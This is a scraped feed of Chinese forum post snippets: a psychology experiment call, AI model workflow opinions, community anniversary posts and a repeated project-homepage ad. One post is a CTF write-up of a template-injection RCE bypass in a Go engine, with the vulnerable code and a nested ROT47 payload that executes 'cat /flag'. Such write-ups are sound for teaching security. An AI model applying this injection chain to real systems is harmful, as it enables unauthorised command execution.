各位佬,这次带来了个好玩的社科小实验。 先介绍下我本人,开阳是一个畜牧学相关的博士后,最近搞了个专升本应用心理学的成人高考XD。最近找了个小想法,就走claude vibecoding了一下做了个小页面,各位老哥如果无聊可以玩一玩哈哈哈。链接在: http://trial.guozitai.com (挂我网站上了)。 用claude写了个介绍,因为我得下班回家了。。。各位佬凑合看。。 不知道你有没有过这种体验:盯着"光""田"这种字看久了,突然觉得它不像个字了、像一堆乱画的笔画——这在心理学里叫**字形饱和 / 完形崩坏**,是个真实、良性、移开视线就恢复的现象。 > 我在做一个关于它的小研究,缺一些参与者帮忙跑个在线小实验: **约 6–8 分钟**,手机/电脑都行(手机点屏幕即可); 任务很简单:盯几个汉字看一会儿,然后给"它现在有多不像字"打个分; **全程匿名**,不收集任何身份信息,随时可关页面退出; 没有对错,凭你**当下的真实感觉**点就行;结尾有个框,想吐槽/留言都欢迎。 ps:本项目在OSF上备案XD osf.io OSF (如果这种东西不能发请艾特我 我删帖) 1 个帖子 - 1 位参与者 阅读完整话题
就基础编码而言,4.6 和 5.5 已经完全够用了。 高性价比的工作流程:国模搭配 5.5 完成,疑难杂症可以交给 Fable 5 来处理。 高配版的工作流程:4.8/5.5 完成,疑难杂症交给 Fable 5 来处理。 家里有矿版的工作流程:全程 Fable 5 ,一直爽。 可以看到, 就编程而言,Fable 5 并没有原子弹级别的突破,价格越来越高,账单越来越离谱,但实际的业务转化并没有提升多少。 就科研而言,Fable 5 限制重重,而且会强制“共享”你的数据。如果真有什么科研突破,只能祈祷这货能有道德了。
就基础编码而言,4.6 和 5.5 已经完全够用了。 高性价比的工作流程:国模搭配 5.5 完成,疑难杂症可以交给 Fable 5 来处理。 高配版的工作流程:4.8/5.5 完成,疑难杂症交给 Fable 5 来处理。 家里有矿版的工作流程:全程 Fable 5 ,一直爽。 可以看到, 就编程而言,Fable 5 并没有原子弹级别的突破,价格越来越高,账单越来越离谱,但实际的业务转化并没有提升多少。 就科研而言,Fable 5 限制重重,而且会强制“共享”你的数据。如果真有什么科研突破,只能祈祷这货能有道德了。
就基础编码而言,4.6 和 5.5 已经完全够用了。 高性价比的工作流程:国模搭配 5.5 完成,疑难杂症可以交给 Fable 5 来处理。 高配版的工作流程:4.8/5.5 完成,疑难杂症交给 Fable 5 来处理。 家里有矿版的工作流程:全程 Fable 5 ,一直爽。 可以看到, 就编程而言,Fable 5 并没有原子弹级别的突破,价格越来越高,账单越来越离谱,但实际的业务转化并没有提升多少。 就科研而言,Fable 5 限制重重,而且会强制“共享”你的数据。如果真有什么科研突破,只能祈祷这货能有道德了。
就基础编码而言,4.6 和 5.5 已经完全够用了。 高性价比的工作流程:国模搭配 5.5 完成,疑难杂症可以交给 Fable 5 来处理。 高配版的工作流程:4.8/5.5 完成,疑难杂症交给 Fable 5 来处理。 家里有矿版的工作流程:全程 Fable 5 ,一直爽。 可以看到, 就编程而言,Fable 5 并没有原子弹级别的突破,价格越来越高,账单越来越离谱,但实际的业务转化并没有提升多少。 就科研而言,Fable 5 限制重重,而且会强制“共享”你的数据。如果真有什么科研突破,只能祈祷这货能有道德了。
就基础编码而言,4.6 和 5.5 已经完全够用了。 高性价比的工作流程:国模搭配 5.5 完成,疑难杂症可以交给 Fable 5 来处理。 高配版的工作流程:4.8/5.5 完成,疑难杂症交给 Fable 5 来处理。 家里有矿版的工作流程:全程 Fable 5 ,一直爽。 可以看到, 就编程而言,Fable 5 并没有原子弹级别的突破,价格越来越高,账单越来越离谱,但实际的业务转化并没有提升多少。 就科研而言,Fable 5 限制重重,而且会强制“共享”你的数据。如果真有什么科研突破,只能祈祷这货能有道德了。
你们的头像都哪来的呀 分享一下家人们,想有趣一点的img 4 个帖子 - 4 位参与者 阅读完整话题
突然收到通知 没想到这么快,来L站已经一年多了。 佬们都很有趣,每天都想打开L站已经上瘾了 为了庆祝,之前的 企业PPLX Pro 已经取消LDC支付,使用L站账号即可直接登录。 祝L站越来越好! 学AI,上L站! 1 个帖子 - 1 位参与者 阅读完整话题
差不多这样,挺有趣的。 1 个帖子 - 1 位参与者 阅读完整话题
画风好看剧情无聊的太多了,甚至很多连画风都达不到的。有没有什么有趣的游戏 26 个帖子 - 24 位参与者 阅读完整话题
(作文题目是瞎编的) 5 个帖子 - 5 位参与者 阅读完整话题
打开codex app,打开底部终端,输入claude,然后开始蹬 刚看到的一个很有趣的梗图,确实能互相通讯哈哈,不过肯定是不如正经多agent协同框架的,娱乐向 3 个帖子 - 3 位参与者 阅读完整话题
6月6号,66大顺! 19了可恶,不是成年人最权威的年下18了( 加入L站也正好一个月了,确实是一个很有趣的社区,虽然社区规则也挺严格的,但是也没有外界传的那么玄乎,自己在里面待了一个月,收获了很多公益大佬的额度,也体会到了其他平台上没有的体验,还是很不错的,希望能够继续和各位佬友们好好相处吧哈哈,今后也希望我能够写出或者提供出我自己的独特价值,和各位佬友,以及放到互联网上分享!开源精神万岁,互联网精神万岁! 好了写完真的要睡觉了,争取早点睡,也祝佬友们能早点睡吧, 虽然我应该早点睡的,还是想要在11点左右睡最好 16 个帖子 - 16 位参与者 阅读完整话题
前几天更新了 快问快答 多选解决方案的功能,今天看这个新更的 Me Too 挺有趣,就做了一下移植。 现在 快问快答 主帖会多出一个 Me Too 按钮,当然中文我简单汉化了一下。 85 个帖子 - 81 位参与者 阅读完整话题
当然这只是其中一张插图~()当然我觉得可谓点睛之笔 3 个帖子 - 3 位参与者 阅读完整话题
自定义模板引擎的 RCE 绕过:从嵌套变量到 strrot “特洛伊木马” 工整一些,主要是想探讨一下一个有趣的替换模板问题,也就是嵌套正则导致的绕过,来源于ACTF templateCommandRE = regexp.MustCompile(`(?is)<\\.*?/>`) templateVarRE = regexp.MustCompile(`(?is)%(.*)%`) templateFuncRE = regexp.MustCompile(`(?is)^<\\\s*?(([a-z0-9_]+)\('([^']*?)'\);\s*?(unsafe)?\s*?)\s*?/>$`) quotedCommandRE = regexp.MustCompile(`(?is)^<\\(\s*?('[^']*?')*?\s*?)*?/>$`) 在我看来有点像贪婪和非贪婪的解析错位导致的逃逸 func parseTemplateString(input string, vars map[string]string) (string, error) { out := input for i := 0; i < 100; i++ { cmd := templateCommandRE.FindString(out) if cmd == "" { return out, nil } replacement, err := commandHandler(cmd, vars) if err != nil { return "", err } out = strings.ReplaceAll(out, cmd, replacement) } return "", errors.New("template recursion limit exceeded") } func commandHandler(cmd string, vars map[string]string) (string, error) { handled := cmd if matches := templateVarRE.FindStringSubmatch(cmd); matches != nil { name := matches[1] handled = strings.ReplaceAll(handled, "%"+name+"%", "'"+getVar(name, vars)+"'") } else if matches := templateFuncRE.FindStringSubmatch(cmd); matches != nil { body := matches[1] funcName := strings.ToLower(matches[2]) param := matches[3] unsafe := matches[4] != "" fn, ok := templateFuncs[funcName] if !ok { return "undefined", nil } if !unsafe && !fn.safe { return "", errAccessDenied } res, err := fn.call(param) if err != nil { return "", err } handled = strings.ReplaceAll(handled, body, "'"+res+"'") } if handled != cmd { return handled, nil } if !quotedCommandRE.MatchString(cmd) { return "undefined", nil } out := strings.ReplaceAll(cmd, "'", "") out = strings.ReplaceAll(out, `<\`, "") out = strings.ReplaceAll(out, `/>`, "") return out, nil } 需要构造的命令需要包含unsafe才能command执行,但是这里只能控制%name%并且没法确定结构, 可以细看模板的替换规律,进模板之前都会做一次贪婪匹配 templateCommandRE = regexp.MustCompile(`(?is)<\\.*?/>`) 然后第二层就是替换%%模板,又或者传进的是函数,那就检查函数, 得益于在这开始是循环进行的,也就是 for i := 0; i < 100; i++ { 可以进行嵌套体的传入,也就是说,第一步会消去%%化为’‘并且将模板原封不动传入,这里是贪婪匹配,在最后如果非函数格式,又会对消除’ ’ 并且上述的 "strrot": { safe: true, call: func(value string) (string, error) { return strrot(value), nil }, }, 函数可以原封不动return字符串, name = "<<%n1%" n1 = "%n2%" n2 =r"\\%n3%" n3 = "%n4%" n4 = "strrot(%" 这样嵌套体进行上传,数次%%替换就是 <\ '<<''\\''strrot(%''''' /> 这样并非函数在检查到非%%和函数的情况下 消除对称的’ '后就是 <\<<\\strrot(% /> 再消除<\ />后就成了 <\strrot(%, 紧接着就进入了新一轮匹配 这样就是贪婪匹配了,接下来的模板,直到下一个>,因为gin对于变量名很宽松 这样就可以构造出很长的变量名,而所以说 <\strrot(%xxxx\> 中间的xxxx可以进行任意替换, 并且strrot函数可以原封不动返回,看到这我想,妙哉~~ 如此再利用%%替换为’'可以直接替换为函数体,但是怎么插入拼接需要的执行体呢 编码,是的,strrot函数会返回解码内容, ROT47("/><\run('cat /flag');unsafe/>") 于是变成了 <\strrot('<rotated_payload>'); /> 然后整个结构体就变成了 <\/><\run('cat /flag');unsafe/>/> 最开始的非贪婪匹配又会将空的</>删去, 紧接着匹配的就是 <\run('cat /flag');unsafe/> 如此一来就可以对于模板的限制进行逃逸了,好困,bye 1 个帖子 - 1 位参与者 阅读完整话题
各位大佬,做了一个统一的 homepage 页 https://homepage.aiones.cc/ ,统一展示 coding 项目的页面,可以直接上报自己的项目,默认直接会展示出来,希望我们 vibe coding 的项目做大做强!让有需要的人可以方便找到各位大佬的项目,有什么建议也可以直接提给我哦!
各位大佬,做了一个统一的 homepage 页 https://homepage.aiones.cc/ ,统一展示 coding 项目的页面,可以直接上报自己的项目,默认直接会展示出来,希望我们 vibe coding 的项目做大做强!让有需要的人可以方便找到各位大佬的项目,有什么建议也可以直接提给我哦!
各位大佬,做了一个统一的 homepage 页 https://homepage.aiones.cc/ ,统一展示 coding 项目的页面,可以直接上报自己的项目,默认直接会展示出来,希望我们 vibe coding 的项目做大做强!让有需要的人可以方便找到各位大佬的项目,有什么建议也可以直接提给我哦!
各位大佬,做了一个统一的 homepage 页 https://homepage.aiones.cc/ ,统一展示 coding 项目的页面,可以直接上报自己的项目,默认直接会展示出来,希望我们 vibe coding 的项目做大做强!让有需要的人可以方便找到各位大佬的项目,有什么建议也可以直接提给我哦!